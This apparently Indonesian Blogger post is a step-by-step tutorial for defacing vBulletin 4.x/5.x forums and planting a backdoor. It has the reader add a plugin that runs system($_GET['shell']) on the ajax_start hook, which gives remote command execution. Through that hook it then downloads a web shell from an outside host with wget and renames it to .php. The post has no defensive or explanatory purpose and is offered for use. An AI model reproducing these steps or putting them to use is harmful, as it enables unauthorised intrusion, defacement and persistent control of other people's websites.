Teman

Powered by Blogger.

Tutorial Deface vBulletin 4 1 X 5 X X and Upload Backdoor

Setelah login di vBulletin

1. Plugins & Products > Add New Plugin
2. [Add New Plugin]
3. Pada Product : vBulletin
    Hook Location : ajax_start
    Title : shell
    Plugin PHP Code : system($_GET['shell']);
    Plugin is Active : Yes
4. ganti url http://localhost/admincp/ menjadi http://localhost/ajax.php?shell=ls
5. ganti url http://localhost/ajax.php?shell=ls menjadi http://localhost/ajax.php?shell=wget http://justmamadon.asia/SHELL/xF-Frizzy.txt
6. ganti url http://localhost/ajax.php?shell=wget http://justmamadon.asia/SHELL/xF-Frizzy.txt menjadi http://localhost/ajax.php?shell=ls pastikan kalau shell yang berformat txt itu sudah ada.
7. ganti url http://localhost/ajax.php?shell=ls menjadi ganti url http://localhost/ajax.php?shell=mv xF-Frizzy.txt xF-Frizzy.php
8. taraaaaa shellnya udah nyangkut kok di http://localhost/xF-Frizzy.php

atau anda bisa liat video tutorialnya :



sekian tutorial copo dari saya :v